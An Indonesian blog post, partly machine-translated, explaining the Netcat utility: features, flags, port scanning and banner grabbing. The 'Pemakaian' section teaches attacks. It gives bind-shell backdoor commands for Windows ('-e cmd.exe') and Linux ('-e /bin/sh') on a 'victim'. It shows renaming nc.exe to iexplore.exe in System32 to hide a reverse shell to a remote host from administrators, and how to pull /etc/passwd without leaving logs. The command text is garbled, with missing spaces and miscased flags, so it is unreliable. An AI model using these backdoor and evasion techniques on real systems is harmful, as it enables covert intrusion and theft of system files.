Tkj Jambi STMIK Nurdin Hamzah Jambi, Teknik Informatika

Wednesday, 5 August 2015

Pengertian NetCat Dan Fiturnya


 
Netcat adalah sebuah utiliti yang digunakan untuk berbagai hal yang berkaitan dengan
protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paketpaket
UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.
Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi originalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).


FiturnyaFitur dari Netcat antara lain adalah:

* Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
* Dapat membaca argumen pada command line dari standar input
* Full DNS forwarding/reverse checking
* Kemampuan untuk menggunakan any local source port
* Kemampuan menggunakan any locally-configured network source address
* Tersedia port scanning secara built-in
* Dan lain-lain


Dengan fitur² diatas banyak pengelola system memanfaatkannya untuk melakukan hal-hal kurang lebihnya seperti berikut ini :
* Scanning port dan menginventori service-service yang terpasang pada server
* File transfer
* Pengujian dan simulasi terhadap server
* Pengujian terhadap firewall, proxy dan gateway
* Pengujian performance network
* Pengujian address spoofing
* Banner grabbing

Instalasi Netcat

Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tools/network_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda.
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download,
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat

Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt.


Port Scanning

Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka.
Banner Grabbing

Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Baris Perintah

-D Menempatkan netcat dalam mode siluman. Oleh karena itu berjalan di latar belakang. Perintah ini hanya tersedia pada windows.
-E <command> Jika dikompilasi menjadi pilihan GAPING_SECURITY_HOLE, sebuah netcat mendengarkan akan mengeksekusi <command> setiap saat seseorang membuat koneksi pada port yang itu mendengarkan
-I <seconds> ini adalah interval penundaan. Ini adalah jumlah waktu netcat menunggu antara data mengirimkan.
-G <route-list> Netcat mendukung routing longgar.
-G <hop-pointer> Pilihan ini memungkinkan Anda untuk mengontrol ip di rute-list Anda hop berikutnya.
-L ini adalah mendengarkan mode.
-L ini adalah mode mendengarkan kuat hanya availiable di windows. Ini memberitahu Netcat untuk memulai kembali modus Dengar nya dengan opsi baris perintah yang sama setelah sambungan ditutup
-N Menceritakan netcat untuk tidak melakukan pencarian nama host.
-O <hexfile> Apakah hex dump pada data dan menyimpannya dalam hexfile.
-P <port> Menentukan pelabuhan
-R Netcatchooses port lokal dan remote acak.
SSpecifies-ip alamat sumber netcat harus digunakan saat membuat koneksi nya.
-T Jika dikompilasi dengan opsi telnet netcat akan dapat menangani negosiasi dengan server telnet telnet.
-U Menceritakan netcat menggunakan UDP, bukan TCP.
-V verbose. Mengontrol berapa banyak netcat akan memberitahu Anda apa its lakukan.
-W <seconds> Kontrol berapa lama netcat akan menunggu sebelum membatalkan koneksi.
-Z Menceritakan netcat untuk hanya mengirim data yang cukup untuk menemukan port mana yang mendengarkan dalam kisaran tertentu Anda.
Pemakaian
Netcat Backdoor
Korban:
nc-L-d-p <port>-t-e cmd.exe
-L adalah perintah mendengarkan. -D memberitahu netcat untuk tidak membuka jendela ketika berjalan. -P memberikan port. -T adalah untuk telnet. -E mengaktifkan cmd.exe ketika klien terhubung secara
Klien:
nc-v <ip alamat victim>
catatan: Dalam contoh ini netcat berjalan di latar belakang pada mesin korban. Sebuah sistem admin bisa membuka task manager dan melihat bahwa nc.exe sedang berjalan. Seorang hacker pintar akan mengubah nc.exe untuk sesuatu seperti iexplorer.exe atau updatemanager.exe untuk menghindari suspiscion.
Sekarang, jika seorang sistem administrator menjalankan perintah netstat-a-n terpercaya di DOS prompt, ia mungkin melihat bahwa ada sesuatu yang berjalan pada port yang agak aneh, telnet ke port tersebut, dan menemukan trik. Namun, Windows menggunakan port acak beberapa untuk berbagai alasan dan output netstat dapat memakan waktu untuk mengurai, terutama pada sistem
dengan banyak aktivitas. Hacker mungkin akan mencoba pendekatan yang berbeda.
Jika mereka telah menyusup ke server Citrix, misalnya, diakses oleh beberapa pengguna yang berselancar di Web, Anda akan mengharapkan untuk melihat banyak Domain Name System ( DNS) lookup dan koneksi Web. Menjalankan netstat-a-n akan mengungkapkan beban keluar port TCP 80 koneksi. Alih-alih memiliki sebuah instance dari netcat mendengarkan pada kotak Windows dan menunggu untuk koneksi,
untuk contoh lain Netcat mendengarkan pada kotak remote pada port 80. Di ujung sana, hacker akan menjalankan: nc-l-p 80 Dari kotak Windows, hacker cerdik bisa “menyembunyikan” Netcat dan mengeluarkan perintah ini:
mkdir C: \ Windows \ System32 \ Drivers \ q
move  nc.exe C: \ Windows \ System32 \ Drivers \ q \ iexplore.exe
cd Windows \ System32 \ Drivers \ q
WINDOWS \ System32 \ DRIVER \ q> iexplore.exe
Cmd line:-d-e cmd.exe originix 80
WINDOWS \ System32 \ DRIVER \ q>
Sekarang Netcat mendengarkan harus mengambil perintah shell dari mesin Windows. Hal ini dapat melakukan pekerjaan yang lebih baik menyembunyikan backdoor dari administrator sistem. Pada pandangan pertama, koneksi hanya akan terlihat seperti Internet Explorer membuat koneksi HTTP biasa. Kerugian hanya untuk hacker adalah bahwa setelah mengakhiri shell, tidak ada cara restart itu di sisi Windows.
port Scanning
Perintah:
nc-z-w2 <IP Address> 1-6000
-Z memberitahu netcat untuk menjalankan scan port. -W2 memberitahu netcat menunggu selama 2 detik sebelum memutuskan. 1-6000 adalah port untuk memindai. Jika mau, Anda bisa menambahkan-v atau-vv untuk melihat lebih dari apa yang sedang terjadi sehingga:
nc-vv-z-w2 <IP Address> 1-6000
Banner grabbing
Banner grabbing adalah fungsi yang membantu Anda melihat apa yang berjalan di belakang port tertentu.
Command:
nc <IP Address> 80
Command:
GET HTTP
or
HEAD / HTTP/1.0
File Transfer
Dari sistem di mana file disimpan:
nc-l-u-p 55555 <file_we_want>
Command of receiving system::
nc-u-targethost 55555> copy_of_file
Ini dapat digunakan untuk meraih etc / passwd. Hal ini dapat dilakukan dengan memanfaatkan perintah
nc-l-u-p 55555 </ etc / passwd
Netcat melakukan transfer file di bawah radar. Ini tidak meninggalkan log lain apapun. FTP lainnya melakukan log cuti.
Setting a Trap
Anda bisa menjalankan instance dari netcat pada port hacker dapat mengharapkan untuk menemukan kerentanan. Jika baik Anda, Anda mungkin dapat menjebak hacker menggunakan sesuatu seperti perintah:
nc-l-v-e fakemail.pl-p 25 >> traplog.txt
skrip fakemail mungkin menggemakan beberapa output untuk memberitahu dunia itu berjalan versi sendmail dan praktis mengemis sebuah kanak-kanak script untuk datang hack. Setelah dia lakukan Anda bisa membanjiri dia dengan apa yang pernah Anda inginkan. Jika bagus, Anda bisa menjalankan script untuk ambil IP-nya.
Linux Backdoor
Sebagian besar tutorial ini dibangun di sekitar jendela hacking dengan netcat. Namun, yang sama dapat dilakukan pada sistem Linux dengan perintah:
nc-u-l-p 55555-e / bin / sh nc
Buat penggunaan sendiri
Ada beberapa skrip shell dan program C yang menghasilkan cara yang lebih mungkin untuk menggunakan netcat. Dengan sedikit pemahaman tentang pemrograman komputer Anda dapat membuat penggunaan sendiri dari netcat. Saya mendorong Anda untuk mencoba.
Anda mungkin berpendapat bahwa netcat adalah telnet terbaik Yah itu. Namun memiliki kemampuan jauh lebih. Netcat adalah alat favorit saya karena kesederhanaannya. Hal ini mudah dikompilasi ke dalam script atau kode. Anda mungkin berkata “, kau idiot? Ada beberapa program seperti meterpreter yang dapat digunakan sebagai backdoors yang jauh lebih mudah “Untuk ini saya mengatakan ya saya idiot.,
Tapi netcat jauh lebih dari sekedar backdoor. Anda juga mungkin berkata, “, Anda idiot Bagaimana Anda mendapatkan salinan nc.exe ke folder system32 tanpa harus akses ke komputer?.” Sekali lagi saya setuju saya bodoh tapi saya mendorong Anda untuk belajar program di C atau menulis script di perl dan menemukan cara untuk mengkompilasi nc.exe ke dalam kode atau script. Ini adalah alat untuk ada di gudang Anda, bahkan jika Anda adalah penggemar meterpreter. Ada banyak kegunaan lain dari netcat dari apa yang saya menjelaskan.
Beberapa fitur dan pemanfaatan Netcat akan dijelaskan di bawah. Namun kami harus selalu
mengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang
bukan milik anda sendiri !


sumber artikel :

http://gaduhsimabdi.blogspot.com/2013/01/netcat-netcatadalah-sebuah-utiliti-yang.html

0 komentar:

Post a Comment

TOTAL PAGEVIEWS

Follow Us

Blog Archive

About Me

ilmu komputer zakaria
View my complete profile

Blog Archive

blog

https://ilmukomputerzakaria.blogspot.com https://perhitunganakuntansitkjzakaria.blogspot.com https://debianzakariamustin.blogspot.com

Translate

Muhammad Zakaria Mustin. Powered by Blogger.

Contact Form

Name

Email *

Message *